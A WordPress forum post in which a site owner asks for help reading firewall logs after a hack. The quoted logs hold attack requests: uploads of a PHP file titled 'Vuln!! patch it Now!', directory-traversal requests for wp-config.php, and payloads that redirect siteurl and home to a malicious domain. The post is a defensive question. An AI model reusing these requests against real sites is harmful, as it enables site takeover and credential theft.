Question about some logs after hack
-
Hi there,
one of our sites got hacked, it seems to have used the recent Easy SMTP plugin attempt.Besides other changes I installed your firewall plugin in the site.
Now I can see the attacks in the firewall log.Besides attempts to change the wp_options table, I also got logs of “Code Injection”.
Maybe you can shortly explain/clearify these logs to me?21/Mar/19 17:16:23 #7144190 UPLOAD - 192.99.15.139 POST /wp-admin/admin-post.php - File upload detected, no action taken - [rock.zip (2,860 bytes)] - mail.xxxxx.com 21/Mar/19 17:16:23 #7383333 CRITICAL 1407 192.99.15.139 POST /wp-admin/admin-post.php - Unrestricted file upload - [GET:page = wysija_campaigns] - mail.xxxxx.com 21/Mar/19 17:16:54 #4900521 UPLOAD - 192.99.15.139 POST /wp-admin/admin-post.php - File upload detected, no action taken - [settings_auto.php (925 bytes)] - mail.xxxxx.com 21/Mar/19 17:17:17 #1852218 CRITICAL 155 192.99.15.139 POST /wp-admin/admin-ajax.php - Code injection - [POST:--b40265e60d5f25c1440f8db641ea5d6f%0d%0aContent-Disposition:_form-data;_name = "popimg"; filename="settings_auto.php"%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?php%0d%0afunction http_get($url){%0d%0a%09$im = c...] - mail.xxxxx.com 21/Mar/19 17:17:23 #3186679 CRITICAL 155 192.99.15.139 POST /index.php - Code injection - [POST:--836475a2fc97d3edcbb4a39618d84de2%0d%0aContent-Disposition:_form-data;_name = "file"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?...] - mail.xxxxx.com 21/Mar/19 17:17:40 #7238211 CRITICAL 1515 192.99.15.139 GET /index.php - Unauthorized action - [GET:up_auto_log = true] - mail.xxxxx.com 21/Mar/19 17:18:08 #2792593 CRITICAL 155 192.99.15.139 POST /wp-admin/admin-ajax.php - Code injection - [POST:--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition:_form-data;_name = "action"%0d%0a%0d%0anm_personalizedproduct_upload_file%0d%0a--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition: form-data; name...] - mail.xxxxx.com 21/Mar/19 17:18:17 #8139554 CRITICAL 1 192.99.15.139 GET /index.php - Directory traversal - [GET:path = ../../../../../wp-config.php] - mail.xxxxx.com 21/Mar/19 17:18:30 #8476871 CRITICAL 1 192.99.15.139 GET /index.php - Directory traversal - [GET:pic = ../../../../../wp-config.php] - mail.xxxxx.com 21/Mar/19 17:18:33 #1356479 CRITICAL 155 192.99.15.139 POST /index.php - Code injection - [POST:--6e73917032ae1df5b2a8bf273afccdc8%0d%0aContent-Disposition:_form-data;_name = "Filedata"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>...] - mail.xxxxx.com
and
22/Mar/19 06:52:31 #4905596 CRITICAL 1353 138.197.142.212 POST /wp-admin/admin-ajax.php - Attempt to modify options table - [POST:data = {"type":"save_setting","append":false,"option":"siteurl","value" :"https://strangefullthiggngs.com/rekjhtge"}] - xxxxx.com 22/Mar/19 06:52:37 #5157617 CRITICAL 1353 138.197.142.212 POST /wp-admin/admin-ajax.php - Attempt to modify options table - [POST:data = {"type":"save_setting","append":false,"option":"home","value" :"https://strangefullthiggngs.com/32qjhgfaa.php"}] - xxxxx.com
Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
- The topic ‘Question about some logs after hack’ is closed to new replies.